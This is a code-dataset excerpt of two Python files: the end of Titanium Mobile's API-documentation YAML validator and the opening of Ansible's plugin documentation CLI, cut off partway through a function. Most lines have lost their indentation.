if not options.errorsOnly or error.hasErrors():
print '%s:' % path
self.printTrackerStatus(error)
def printTrackerStatus(self, error, indent=1):
if error.hasErrors():
self.printError(error, indent)
elif options.verbose or indent == 1:
self.printCheck(error, indent)
for msg in error.errors:
self.printError(msg, indent + 1)
self.error_count += 1
for child in error.children:
self.printTrackerStatus(child, indent + 1)
class SimplePrinter(Printer):
def printStatus(self, path, error):
self.printTrackerStatus(error, path)
def addField(self, line, field):
if len(line) > 0:
line += " : "
line += stringFrom(field)
return line
def printTrackerStatus(self, error, line = ""):
line = self.addField(line, error.name)
for msg in error.errors:
self.printError(self.addField(line, msg))
if len(error.children) > 0:
for child in error.children:
self.printTrackerStatus(child, line)
else:
self.printCheck(line)
def printCheck(self, msg):
if not options.errorsOnly:
print "PASS: " + msg
def printError(self, msg):
print "FAIL: " + msg
self.error_count += 1
class ErrorTracker(object):
TRACKER_FOR_TYPE = 0
TRACKER_FOR_METHOD = 1
TRACKER_FOR_PROPERTY = 2
TRACKER_FOR_EVENT = 3
TRACKER_FOR_METHOD_PARAMETER = 4
TRACKER_FOR_EVENT_PROPERTY = 5
TRACKER_FOR_REF = 5
def __init__(self, name, trackerFor, parent=None):
self.name = name
self.trackerFor = trackerFor
self.errors = []
self.children = []
self.parent = parent
if self.parent != None:
self.parent.children.append(self)
def trackError(self, description):
self.errors.append(description)
def getTracker(self, childName):
for child in self.children:
if child.name == childName:
return child
return None
def hasErrors(self):
if len(self.errors) > 0:
return True
for child in self.children:
if child.hasErrors():
return True
return False
def validateKeys(tracker, obj, objType, displayName=None):
validKeys = VALID_KEYS[objType]
if not isinstance(obj, dict):
return
if displayName:
objName = displayName
elif "name" in obj:
objName = obj["name"]
else:
objName = "object"
invalid = [k for k in obj.keys() if k not in validKeys]
if invalid:
tracker.trackError("Invalid key(s) in %s: %s" % (objName, invalid))
# A missing piece of documentation could be inherited, since we
# support that as-of TIMOB-7419. This checks to see if its there
# after all inherited documentation has been resolved.
def propertyIsGenerated(tracker, propertyName):
parent = tracker.parent
if not parent:
return False
while parent.parent:
parent = parent.parent
if parent.trackerFor != ErrorTracker.TRACKER_FOR_TYPE:
return False
typeName = parent.name
if typeName not in typesFromDocgen:
return False
generatedType = typesFromDocgen[typeName]
memberToCheck = None
listType = None
if tracker.trackerFor == ErrorTracker.TRACKER_FOR_METHOD:
listType = "methods"
elif tracker.trackerFor == ErrorTracker.TRACKER_FOR_PROPERTY:
listType = "properties"
elif tracker.trackerFor == ErrorTracker.TRACKER_FOR_EVENT:
listType = "events"
if not memberToCheck and listType:
the_list = generatedType[listType]
matching_members = [m for m in the_list if m["name"] == tracker.name]
if matching_members:
memberToCheck = matching_members[0]
if not memberToCheck:
return False
else:
return propertyName in memberToCheck
def validateRequired(tracker, map, required):
for r in required:
if r not in map and not propertyIsGenerated(tracker, r):
tracker.trackError('Required property "%s" not found' % r)
def validatePlatforms(tracker, platforms):
if type(platforms) != list:
tracker.trackError('"platforms" specified, but isn\'t a list: %s' % platforms)
for p in platforms:
if p not in VALID_PLATFORMS:
tracker.trackError('platform specifier "%s" is not valid. Valid platforms are: %s.' % (p, VALID_PLATFORMS))
def validateSince(tracker, since):
if type(since) not in [str, dict]:
tracker.trackError('"since" should either be a version inside a string, or a dictionary of platform to version: %s, %s' % (since, type(since)))
def validateDeprecated(tracker, deprecated):
if type(deprecated) != dict or 'since' not in deprecated:
tracker.trackError('"deprecated" should be a dictionary with "since" and optional "removed" versions: %s' % deprecated)
validateKeys(tracker, deprecated, "deprecated", "deprecated")
def validateOsVer(tracker, osver):
if type(osver) != dict:
tracker.trackError('"osver" should be a dictionary of platforms to version dictionaries')
for key, value in osver.iteritems():
if type(value) != dict:
tracker.trackError('"osver" for platform "%s" should be a dictionary with platforms mapping to dictionaries of "mix" (String), "max" (String), and/or "versions" (List)' % (key, value))
def validateIsBool(tracker, name, value):
if not isinstance(value, bool):
tracker.trackError('"%s" should either be true or false: %s, %s' % (name, value, type(value)))
def validateIsOneOf(tracker, name, value, validValues):
if value not in validValues:
tracker.trackError('"%s" should be one of %s, but was %s' % (name, ", ".join(validValues), value))
def validateMarkdown(tracker, mdData, name):
try:
html = markdown.markdown(mdData)
except Exception, e:
tracker.trackError('Error parsing markdown block "%s": %s' % (name, e))
def findType(tracker, typeName, name):
base_types = ('void', 'Dictionary', 'Boolean', 'Number', 'String', 'Date', 'Object', 'Callback')
if typeName in base_types:
return
containerRegex = r'(Dictionary|Callback|Array)\<([^\>]+)\>'
match = re.match(containerRegex, typeName)
if match:
if not typeName.endswith('>>'):
elementType = match.group(2)
findType(tracker, elementType, name)
return
else:
# We've got something like Array<Dictionary<Titanium.Map.Annotation>>
pos = typeName.index('<')
findType(tracker, typeName[pos+1:-1], name)
return
found = False
for tdocPath, tdocTypes in types.iteritems():
for t in tdocTypes:
if 'name' in t and t['name'] == typeName:
found = True
break
if not found:
properCase = "%s%s" % (typeName[0].upper(), typeName[1:])
if properCase in base_types:
tracker.trackError('"%s" type "%s" could not be found, perhaps "%s" was meant' % (name, typeName, properCase))
elif typeName.lower() == 'void':
# "void" is an exception to the proper casing
tracker.trackError('"%s" type "%s" could not be found, perhaps "void" was meant' % (name, typeName))
else:
tracker.trackError('"%s" type "%s" could not be found' % (name, typeName))
def validateCommon(tracker, map):
if 'platforms' in map:
validatePlatforms(tracker, map['platforms'])
if 'since' in map:
validateSince(tracker, map['since'])
if 'deprecated' in map:
validateDeprecated(tracker, map['deprecated'])
if 'osver' in map:
validateOsVer(tracker, map['osver'])
if 'createable' in map:
validateIsBool(tracker, 'createable', map['createable'])
if 'permission' in map:
validateIsOneOf(tracker, 'permission', map['permission'],
('read-only', 'write-only', 'read-write'))
if 'availability' in map:
validateIsOneOf(tracker, 'availability', map['availability'],
('always', 'creation', 'not-creation'))
if 'accessors' in map:
validateIsBool(tracker, 'accessors', map['accessors'])
if 'optional' in map:
validateIsBool(tracker, 'optional', map['optional'])
if 'repeatable' in map:
validateIsBool(tracker, 'repeatable', map['repeatable'])
if 'notes' in map:
tracker.trackError('"notes" field is no longer valid')
if options.validateSummary:
if 'summary' in map:
summary = map['summary']
            if summary is not None and len(summary.strip()) > 0:
                summary = summary.strip()
                if not summary[0].isupper() or summary[-1] != ".":
tracker.trackError('summary fields should start with a capital letter and end with a period. summary: %s' % summary)
else:
tracker.trackError('summary missing required text.')
def validateMethod(typeTracker, method):
tracker = ErrorTracker(method['name'], ErrorTracker.TRACKER_FOR_METHOD, typeTracker)
validateKeys(tracker, method, "method")
validateRequired(tracker, method, ['name', 'summary'])
validateCommon(tracker, method)
if 'returns' in method:
returns = method['returns']
if type(returns) != dict and type(returns) != list:
tracker.trackError('"returns" must be an Object or list of Objects: %s' % returns)
return
if type(returns) != list:
returns = [returns]
for oneReturn in returns:
if type(oneReturn) != dict:
tracker.trackError('"returns" must be an Object or list of Objects: %s' % returns)
return
            if 'type' not in oneReturn:
                tracker.trackError('Required property "type" missing in "returns": %s' % returns)
            elif not isinstance(oneReturn["type"], basestring):
                tracker.trackError('"type" value of returns element must be a string: %s' % oneReturn["type"])
if 'parameters' in method:
if type(method['parameters']) != list:
tracker.trackError('"parameters" must be a list')
for param in method['parameters']:
pTracker = ErrorTracker(param['name'], ErrorTracker.TRACKER_FOR_METHOD_PARAMETER, tracker)
validateKeys(pTracker, param, "parameter")
validateRequired(pTracker, param, ['name', 'summary', 'type'])
validateCommon(pTracker, param)
if 'examples' in method:
validateExamples(tracker, method['examples'])
def validateProperty(typeTracker, property):
tracker = ErrorTracker(property['name'], ErrorTracker.TRACKER_FOR_PROPERTY, typeTracker)
validateKeys(tracker, property, "property")
validateRequired(tracker, property, ['name', 'summary', 'type'])
validateCommon(tracker, property)
if 'examples' in property:
validateExamples(tracker, property['examples'])
constantRegex = r'[A-Z]+[A-Z_]*'
match = re.match(constantRegex, property['name'])
if match:
if not 'permission' in property:
tracker.trackError('Required property for constant "permission" not found')
else:
if not property['permission'] == 'read-only':
tracker.trackError("Constant should have 'read-only' permission.")
def validateEvent(typeTracker, event):
tracker = ErrorTracker(event['name'], ErrorTracker.TRACKER_FOR_EVENT, typeTracker)
validateKeys(tracker, event, "event")
validateRequired(tracker, event, ['name', 'summary'])
validateCommon(tracker, event)
if 'properties' in event:
if type(event['properties']) != list:
tracker.trackError('"properties" specified, but isn\'t a list')
return
for p in event['properties']:
pTracker = ErrorTracker(p['name'], ErrorTracker.TRACKER_FOR_EVENT_PROPERTY, tracker)
validateKeys(pTracker, p, "eventprop")
validateRequired(pTracker, p, ['name', 'summary'])
validateCommon(pTracker, p)
def validateExamples(tracker, examples):
if not isinstance(examples, list):
tracker.trackError('"examples" must be a list: %s' % examples)
return
for example in examples:
if not isinstance(example, dict) or 'title' not in example or 'example' not in example:
tracker.trackError('each example must be a dict with "title" and "example" members: %s' % example)
continue
validateMarkdown(tracker, example['example'], 'example')
def validateExcludes(tracker, excludes):
if not isinstance(excludes, dict):
tracker.trackError('"excludes" must be a dict and cannot be empty')
return
for category in excludes:
if category not in ['events','properties','methods']:
tracker.trackError('only "events","properties", and "methods" are allowed in "excludes": %s' % category)
continue
if not isinstance(excludes[category], list):
tracker.trackError('"%s" must be a list' % category)
continue
def validateType(typeDoc):
typeName = typeDoc['name']
errorTrackers[typeName] = ErrorTracker(typeName, ErrorTracker.TRACKER_FOR_TYPE)
tracker = errorTrackers[typeName]
validateRequired(tracker, typeDoc, ['name', 'summary'])
validateCommon(tracker, typeDoc)
if 'excludes' in typeDoc:
validateExcludes(tracker, typeDoc['excludes'])
if 'description' in typeDoc:
validateMarkdown(tracker, typeDoc['description'], 'description')
if 'examples' in typeDoc:
validateExamples(tracker, typeDoc['examples'])
if 'methods' in typeDoc:
if type(typeDoc['methods']) != list:
tracker.trackError('"methods" specified, but isn\'t a list')
else:
for method in typeDoc['methods']:
validateMethod(tracker, method)
if 'properties' in typeDoc:
if type(typeDoc['properties']) != list:
tracker.trackError('"properties" specified, but isn\'t a list')
else:
for property in typeDoc['properties']:
validateProperty(tracker, property)
if 'events' in typeDoc:
if type(typeDoc['events']) != list:
tracker.trackError('"events" specified, but isn\'t a list')
else:
for event in typeDoc['events']:
validateEvent(tracker, event)
def loadTypesFromDocgen():
global typesFromDocgen
import docgen
docgen.log.level = 2 # INFO
docgen.process_yaml()
docgen.finish_partial_overrides()
typesFromDocgen = docgen.apis
def validateTDoc(tdocPath):
global typesFromDocgen
tdocTypes = [type for type in yaml.load_all(codecs.open(tdocPath, 'r', 'utf8').read())]
if options.parseOnly:
return
if not typesFromDocgen:
try:
loadTypesFromDocgen()
except Exception, e:
# This should be fatal
print >> sys.stderr, e
sys.exit(1)
for type in tdocTypes:
validateType(type)
global types
types[tdocPath] = tdocTypes
def validateRef(tracker, ref, name):
if type(ref) not in [str, list]:
tracker.trackError('"%s" reference "%s" must be either a String or List' % (name, ref))
if type(ref) is str:
findType(tracker, ref, name)
elif type(ref) is list:
for t in ref:
findType(tracker, t, name)
def validateMethodRefs(typeTracker, method):
tracker = typeTracker.getTracker(method['name'])
if 'returns' in method:
if type(method['returns']) == str:
validateRef(tracker, method['returns'], 'returns')
elif type(method['returns']) == dict:
returnObj = method['returns']
rTracker = ErrorTracker(returnObj, ErrorTracker.TRACKER_FOR_REF, tracker)
if 'type' in returnObj:
validateRef(rTracker, returnObj['type'], 'type')
if 'parameters' in method:
for param in method['parameters']:
pTracker = tracker.getTracker(param['name'])
if 'type' in param:
validateRef(pTracker, param['type'], 'type')
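# Second pass over every parsed file: cross-check "extends" references,
# method return and parameter types, and property types.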
def validateRefs():
for tdocPath, tdocTypes in types.iteritems():
for typeDoc in tdocTypes:
tracker = errorTrackers[typeDoc['name']]
if 'extends' in typeDoc:
validateRef(tracker, typeDoc['extends'], 'extends')
if 'methods' in typeDoc:
for method in typeDoc['methods']:
validateMethodRefs(tracker, method)
if 'properties' in typeDoc:
for property in typeDoc['properties']:
pTracker = tracker.getTracker(property['name'])
if 'type' in property:
validateRef(pTracker, property['type'], 'type')
def validateDir(dir):
for root, dirs, files in os.walk(dir):
for file in files:
if file.endswith(".yml") and file != "template.yml":
absolutePath = os.path.join(root, file)
try:
validateTDoc(absolutePath)
except Exception, e:
print >> sys.stderr, ("Error parsing %s: %s:" % (os.path.join(root,file), str(e)))
validateRefs()
def printStatus(dir=None):
if options.format == 'pretty':
printer = PrettyPrinter()
elif options.format == 'simple':
printer = SimplePrinter()
else:
print >> sys.stderr, "Invalid output style: %s. Use 'pretty' or 'simple'" % options.format
sys.exit(1)
keys = types.keys()
keys.sort()
for key in keys:
tdocPath = key
tdocTypes = types[key]
if dir: tdocPath = tdocPath[len(dir)+1:]
for type in tdocTypes:
printer.printStatus(tdocPath, errorTrackers[type["name"]])
print "Errors encountered: %s" % printer.errorCount()
def main(args):
parser = optparse.OptionParser()
parser.add_option('-v', '--verbose', dest='verbose',
action='store_true', default=False, help='enable verbose validation output')
parser.add_option('-d', '--dir', dest='dir',
default=None, help='directory to recursively validate *.yml TDoc2 files')
parser.add_option('-f', '--file', dest='file',
default=None, help='specific TDoc2 file to validate (overrides -d/--dir)')
parser.add_option('-p', '--parse-only', dest='parseOnly',
action='store_true', default=False, help='only check yaml parse-ability')
format_default = "pretty"
if "windows" in platform.system().lower() or "cygwin" in platform.system().lower():
format_default = "simple"
    parser.add_option('-s', '--style', dest='format',
        default=format_default, help='output style: "pretty" or "simple" (default: %s)' % format_default)
parser.add_option('-e', '--errors-only', dest='errorsOnly',
action='store_true', default=False, help='only emit failed validations')
parser.add_option('--warn-summary', dest='validateSummary',
action='store_true', default=False, help='validate summary field')
global options
(options, args) = parser.parse_args(args)
dir=None
if options.file is not None:
# NOTE: because of the introduction of inherited documentation
# fields via TIMOB-7419, using the -f option is not really that
# fast anymore because even if we're just validating one file we need
# to parse all of them in order to see the "final" set of documentation
# for a type.
print "Validating %s:" % options.file
validateTDoc(options.file)
else:
dir = options.dir or apiDocDir
validateDir(dir)
printStatus(dir)
if __name__ == "__main__":
main(sys.argv)
|
hieupham007/Titanium_Mobile
|
apidoc/validate.py
|
Python
|
apache-2.0
| 19,765
|
# (c) 2014, James Tanner <tanner.jc@gmail.com>
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import datetime
import json
import os
import textwrap
import traceback
import yaml
import ansible.plugins.loader as plugin_loader
from ansible import constants as C
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.module_utils._text import to_native
from ansible.module_utils.common._collections_compat import Sequence
from ansible.module_utils.six import string_types
from ansible.parsing.metadata import extract_metadata
from ansible.parsing.plugin_docs import read_docstub
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.plugins.loader import action_loader, fragment_loader
from ansible.utils.plugin_docs import BLACKLIST, get_docstring
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class DocCLI(CLI):
''' displays information on modules installed in Ansible libraries.
It displays a terse listing of plugins and their short descriptions,
provides a printout of their DOCUMENTATION strings,
and it can create a short "snippet" which can be pasted into a playbook. '''
# default ignore list for detailed views
IGNORE = ('module', 'docuri', 'version_added', 'short_description', 'now_date', 'plainexamples', 'returndocs')
def __init__(self, args):
super(DocCLI, self).__init__(args)
self.plugin_list = set()
def parse(self):
self.parser = CLI.base_parser(
usage='usage: %prog [-l|-F|-s] [options] [-t <plugin type> ] [plugin]',
module_opts=True,
desc="plugin documentation tool",
epilog="See man pages for Ansible CLI options or website for tutorials https://docs.ansible.com"
)
self.parser.add_option("-F", "--list_files", action="store_true", default=False, dest="list_files",
help='Show plugin names and their source files without summaries (implies --list)')
self.parser.add_option("-l", "--list", action="store_true", default=False, dest='list_dir',
help='List available plugins')
self.parser.add_option("-s", "--snippet", action="store_true", default=False, dest='show_snippet',
help='Show playbook snippet for specified plugin(s)')
self.parser.add_option("-a", "--all", action="store_true", default=False, dest='all_plugins',
help='**For internal testing only** Show documentation for all plugins.')
self.parser.add_option("-j", "--json", action="store_true", default=False, dest='json_dump',
help='**For internal testing only** Dump json metadata for all plugins.')
self.parser.add_option("-t", "--type", action="store", default='module', dest='type', type='choice',
help='Choose which plugin type (defaults to "module")',
choices=C.DOCUMENTABLE_PLUGINS)
super(DocCLI, self).parse()
if [self.options.all_plugins, self.options.json_dump, self.options.list_dir, self.options.list_files, self.options.show_snippet].count(True) > 1:
raise AnsibleOptionsError("Only one of -l, -F, -s, -j or -a can be used at the same time.")
display.verbosity = self.options.verbosity
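    # Resolve the loader for the requested plugin type, then dispatch: list
    # files, list plugins, dump JSON metadata, or format docs for the named plugins.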
def run(self):
super(DocCLI, self).run()
plugin_type = self.options.type
if plugin_type in C.DOCUMENTABLE_PLUGINS:
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
else:
raise AnsibleOptionsError("Unknown or undocumentable plugin type: %s" % plugin_type)
# add to plugin path from command line
if self.options.module_path:
for path in self.options.module_path:
if path:
loader.add_directory(path)
# save only top level paths for errors
search_paths = DocCLI.print_paths(loader)
loader._paths = None # reset so we can use subdirs below
# list plugins names and filepath for type
if self.options.list_files:
paths = loader._get_paths()
for path in paths:
self.plugin_list.update(self.find_plugins(path, plugin_type))
list_text = self.get_plugin_list_filenames(loader)
self.pager(list_text)
return 0
# list plugins for type
if self.options.list_dir:
paths = loader._get_paths()
for path in paths:
self.plugin_list.update(self.find_plugins(path, plugin_type))
self.pager(self.get_plugin_list_text(loader))
return 0
# process all plugins of type
if self.options.all_plugins:
            self.args = self.get_all_plugins_of_type(plugin_type)
# dump plugin metadata as JSON
if self.options.json_dump:
plugin_data = {}
for plugin_type in C.DOCUMENTABLE_PLUGINS:
plugin_data[plugin_type] = dict()
plugin_names = self.get_all_plugins_of_type(plugin_type)
for plugin_name in plugin_names:
plugin_info = self.get_plugin_metadata(plugin_type, plugin_name)
if plugin_info is not None:
plugin_data[plugin_type][plugin_name] = plugin_info
self.pager(json.dumps(plugin_data, sort_keys=True, indent=4))
return 0
if len(self.args) == 0:
raise AnsibleOptionsError("Incorrect options passed")
# process command line list
text = ''
for plugin in self.args:
textret = self.format_plugin_doc(plugin, loader, plugin_type, search_paths)
if textret:
text += textret
if text:
self.pager(text)
return 0
def get_all_plugins_of_type(self, plugin_type):
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
plugin_list = set()
paths = loader._get_paths()
for path in paths:
plugins_to_add = self.find_plugins(path, plugin_type)
plugin_list.update(plugins_to_add)
return sorted(set(plugin_list))
def get_plugin_metadata(self, plugin_type, plugin_name):
# if the plugin lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
filename = loader.find_plugin(plugin_name, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
raise AnsibleError("unable to load {0} plugin named {1} ".format(plugin_type, plugin_name))
try:
doc, __, __, metadata = get_docstring(filename, fragment_loader, verbose=(self.options.verbosity > 0))
except Exception:
display.vvv(traceback.format_exc())
raise AnsibleError(
"%s %s at %s has a documentation error formatting or is missing documentation." %
(plugin_type, plugin_name, filename))
if doc is None:
if 'removed' not in metadata.get('status', []):
raise AnsibleError(
"%s %s at %s has a documentation error formatting or is missing documentation." %
(plugin_type, plugin_name, filename))
# Removed plugins don't have any documentation
return None
return dict(
name=plugin_name,
namespace=self.namespace_from_plugin_filepath(filename, plugin_name, loader.package_path),
description=doc.get('short_description', "UNKNOWN"),
version_added=doc.get('version_added', "UNKNOWN")
)
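    # Derive a dotted namespace from the plugin's path relative to the loader's
    # package dir (e.g. "cloud/amazon/x.py" -> "cloud.amazon"; illustrative).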
def namespace_from_plugin_filepath(self, filepath, plugin_name, basedir):
if not basedir.endswith('/'):
basedir += '/'
rel_path = filepath.replace(basedir, '')
extension_free = os.path.splitext(rel_path)[0]
namespace_only = extension_free.rsplit(plugin_name, 1)[0].strip('/_')
clean_ns = namespace_only.replace('/', '.')
if clean_ns == '':
clean_ns = None
return clean_ns
def format_plugin_doc(self, plugin, loader, plugin_type, search_paths):
text = ''
try:
# if the plugin lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
display.warning("%s %s not found in:\n%s\n" % (plugin_type, plugin, search_paths))
return
if any(filename.endswith(x) for x in C.BLACKLIST_EXTS):
return
try:
doc, plainexamples, returndocs, metadata = get_docstring(filename, fragment_loader,
verbose=(self.options.verbosity > 0))
except Exception:
display.vvv(traceback.format_exc())
display.error(
"%s %s has a documentation error formatting or is missing documentation." % (plugin_type, plugin),
wrap_text=False)
return
if doc is not None:
# assign from other sections
doc['plainexamples'] = plainexamples
doc['returndocs'] = returndocs
doc['metadata'] = metadata
# generate extra data
if plugin_type == 'module':
# is there corresponding action plugin?
if plugin in action_loader:
doc['action'] = True
else:
doc['action'] = False
doc['filename'] = filename
doc['now_date'] = datetime.date.today().strftime('%Y-%m-%d')
if 'docuri' in doc:
doc['docuri'] = doc[plugin_type].replace('_', '-')
if self.options.show_snippet and plugin_type == 'module':
text += self.get_snippet_text(doc)
else:
text += self.get_man_text(doc)
return text
else:
if 'removed' in metadata.get('status', []):
display.warning("%s %s has been removed\n" % (plugin_type, plugin))
return
# this typically means we couldn't even parse the docstring, not just that the YAML is busted,
# probably a quoting issue.
raise AnsibleError("Parsing produced an empty object.")
except Exception as e:
display.vvv(traceback.format_exc())
raise AnsibleError(
"%s %s missing documentation (or could not parse documentation): %s\n" % (plugin_type, plugin, str(e)))
def find_plugins(self, path, ptype):
display.vvvv("Searching %s for plugins" % path)
plugin_list = set()
if not os.path.exists(path):
display.vvvv("%s does not exist" % path)
return plugin_list
bkey = ptype.upper()
for plugin in os.listdir(path):
display.vvvv("Found %s" % plugin)
full_path = '/'.join([path, plugin])
if plugin.startswith('.'):
continue
elif os.path.isdir(full_path):
continue
elif any(plugin.endswith(x) for x in C.BLACKLIST_EXTS):
continue
elif plugin.startswith('__'):
continue
elif plugin in C.IGNORE_FILES:
continue
            elif plugin.startswith('_'):
if os.path.islink(full_path): # avoids aliases
continue
plugin = os.path.splitext(plugin)[0] # removes the extension
plugin = plugin.lstrip('_') # remove underscore from deprecated plugins
if plugin not in BLACKLIST.get(bkey, ()):
plugin_list.add(plugin)
display.vvvv("Added %s" % plugin)
return plugin_list
def get_plugin_list_text(self, loader):
columns = display.columns
displace = max(len(x) for x in self.plugin_list)
linelimit = columns - displace - 5
text = []
deprecated = []
for plugin in sorted(self.plugin_list):
try:
# if the module lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
continue
if filename.endswith(".ps1"):
continue
if os.path.isdir(filename):
continue
doc = None
try:
doc = read_docstub(filename)
except Exception:
display.warning("%s has a documentation formatting error" % plugin)
continue
if not doc or not isinstance(doc, dict):
with open(filename) as f:
metadata = extract_metadata(module_data=f.read())
if metadata[0]:
if 'removed' not in metadata[0].get('status', []):
display.warning("%s parsing did not produce documentation." % plugin)
else:
continue
desc = 'UNDOCUMENTED'
else:
desc = self.tty_ify(doc.get('short_description', 'INVALID SHORT DESCRIPTION').strip())
if len(desc) > linelimit:
desc = desc[:linelimit] + '...'
if plugin.startswith('_'): # Handle deprecated
deprecated.append("%-*s %-*.*s" % (displace, plugin[1:], linelimit, len(desc), desc))
else:
text.append("%-*s %-*.*s" % (displace, plugin, linelimit, len(desc), desc))
except Exception as e:
raise AnsibleError("Failed reading docs at %s: %s" % (plugin, to_native(e)), orig_exc=e)
if len(deprecated) > 0:
text.append("\nDEPRECATED:")
text.extend(deprecated)
return "\n".join(text)
def get_plugin_list_filenames(self, loader):
columns = display.columns
displace = max(len(x) for x in self.plugin_list)
linelimit = columns - displace - 5
text = []
for plugin in sorted(self.plugin_list):
try:
# if the module lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
continue
if filename.endswith(".ps1"):
continue
if os.path.isdir(filename):
continue
text.append("%-*s %-*.*s" % (displace, plugin, linelimit, len(filename), filename))
except Exception as e:
raise AnsibleError("Failed reading docs at %s: %s" % (plugin, to_native(e)), orig_exc=e)
return "\n".join(text)
@staticmethod
def print_paths(finder):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in finder._get_paths(subdirs=False):
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
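    # Build a pastable playbook snippet: "- name: <short description>", the
    # module name, and one commented line per option. For a hypothetical
    # module "foo" this renders roughly:
    #   - name: Manage the foo service
    #     foo:
    #       name:                # (required) name of the foo to manage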
def get_snippet_text(self, doc):
text = []
desc = CLI.tty_ify(doc['short_description'])
text.append("- name: %s" % (desc))
text.append(" %s:" % (doc['module']))
pad = 31
subdent = " " * pad
limit = display.columns - pad
for o in sorted(doc['options'].keys()):
opt = doc['options'][o]
if isinstance(opt['description'], string_types):
desc = CLI.tty_ify(opt['description'])
else:
desc = CLI.tty_ify(" ".join(opt['description']))
required = opt.get('required', False)
if not isinstance(required, bool):
raise("Incorrect value for 'Required', a boolean is needed.: %s" % required)
if required:
desc = "(required) %s" % desc
o = '%s:' % o
text.append(" %-20s # %s" % (o, textwrap.fill(desc, limit, subsequent_indent=subdent)))
text.append('')
return "\n".join(text)
def _dump_yaml(self, struct, indent):
return CLI.tty_ify('\n'.join([indent + line for line in yaml.dump(struct, default_flow_style=False, Dumper=AnsibleDumper).split('\n')]))
def add_fields(self, text, fields, limit, opt_indent):
for o in sorted(fields):
opt = fields[o]
required = opt.pop('required', False)
if not isinstance(required, bool):
raise AnsibleError("Incorrect value for 'Required', a boolean is needed.: %s" % required)
if required:
opt_leadin = "="
else:
opt_leadin = "-"
text.append("%s %s" % (opt_leadin, o))
if isinstance(opt['description'], list):
for entry in opt['description']:
text.append(textwrap.fill(CLI.tty_ify(entry), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
else:
text.append(textwrap.fill(CLI.tty_ify(opt['description']), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
del opt['description']
aliases = ''
if 'aliases' in opt:
if len(opt['aliases']) > 0:
aliases = "(Aliases: " + ", ".join(str(i) for i in opt['aliases']) + ")"
del opt['aliases']
choices = ''
if 'choices' in opt:
if len(opt['choices']) > 0:
choices = "(Choices: " + ", ".join(str(i) for i in opt['choices']) + ")"
del opt['choices']
default = ''
if 'default' in opt or not required:
default = "[Default: %s" % str(opt.pop('default', '(null)')) + "]"
text.append(textwrap.fill(CLI.tty_ify(aliases + choices + default), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
if 'options' in opt:
text.append("%soptions:\n" % opt_indent)
self.add_fields(text, opt.pop('options'), limit, opt_indent + opt_indent)
if 'spec' in opt:
text.append("%sspec:\n" % opt_indent)
self.add_fields(text, opt.pop('spec'), limit, opt_indent + opt_indent)
conf = {}
for config in ('env', 'ini', 'yaml', 'vars', 'keywords'):
if config in opt and opt[config]:
conf[config] = opt.pop(config)
for ignore in self.IGNORE:
for item in conf[config]:
if ignore in item:
del item[ignore]
if conf:
text.append(self._dump_yaml({'set_via': conf}, opt_indent))
for k in sorted(opt):
if k.startswith('_'):
continue
if isinstance(opt[k], string_types):
text.append('%s%s: %s' % (opt_indent, k, textwrap.fill(CLI.tty_ify(opt[k]), limit - (len(k) + 2), subsequent_indent=opt_indent)))
elif isinstance(opt[k], (Sequence)) and all(isinstance(x, string_types) for x in opt[k]):
text.append(CLI.tty_ify('%s%s: %s' % (opt_indent, k, ', '.join(opt[k]))))
else:
text.append(self._dump_yaml({k: opt[k]}, opt_indent))
text.append('')
@staticmethod
def get_support_block(doc):
# Note: 'curated' is deprecated and not used in any of the modules we ship
support_level_msg = {'core': 'The Ansible Core Team',
'network': 'The Ansible Network Team',
'certified': 'an Ansible Partner',
'community': 'The Ansible Community',
'curated': 'A Third Party',
}
if doc['metadata'].get('metadata_version') in ('1.0', '1.1'):
return [" * This module is maintained by %s" % support_level_msg[doc['metadata']['supported_by']]]
return []
@staticmethod
def get_metadata_block(doc):
text = []
if doc['metadata'].get('metadata_version') in ('1.0', '1.1'):
text.append("METADATA:")
text.append('\tSUPPORT LEVEL: %s' % doc['metadata']['supported_by'])
for k in (m for m in doc['metadata'] if m not in ('version', 'metadata_version', 'supported_by')):
if isinstance(k, list):
text.append("\t%s: %s" % (k.capitalize(), ", ".join(doc['metadata'][k])))
else:
text.append("\t%s: %s" % (k.capitalize(), doc['metadata'][k]))
return text
return []
def get_man_text(self, doc):
self.IGNORE = self.IGNORE + (self.options.type,)
opt_indent = " "
text = []
pad = display.columns * 0.20
limit = max(display.columns - int(pad), 70)
text.append("> %s (%s)\n" % (doc.get(self.options.type, doc.get('plugin_type')).upper(), doc.pop('filename')))
if isinstance(doc['description'], list):
desc = " ".join(doc.pop('description'))
else:
desc = doc.pop('description')
text.append("%s\n" % textwrap.fill(CLI.tty_ify(desc), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
if 'deprecated' in doc and doc['deprecated'] is not None and len(doc['deprecated']) > 0:
text.append("DEPRECATED: \n")
if isinstance(doc['deprecated'], dict):
if 'version' in doc['deprecated'] and 'removed_in' not in doc['deprecated']:
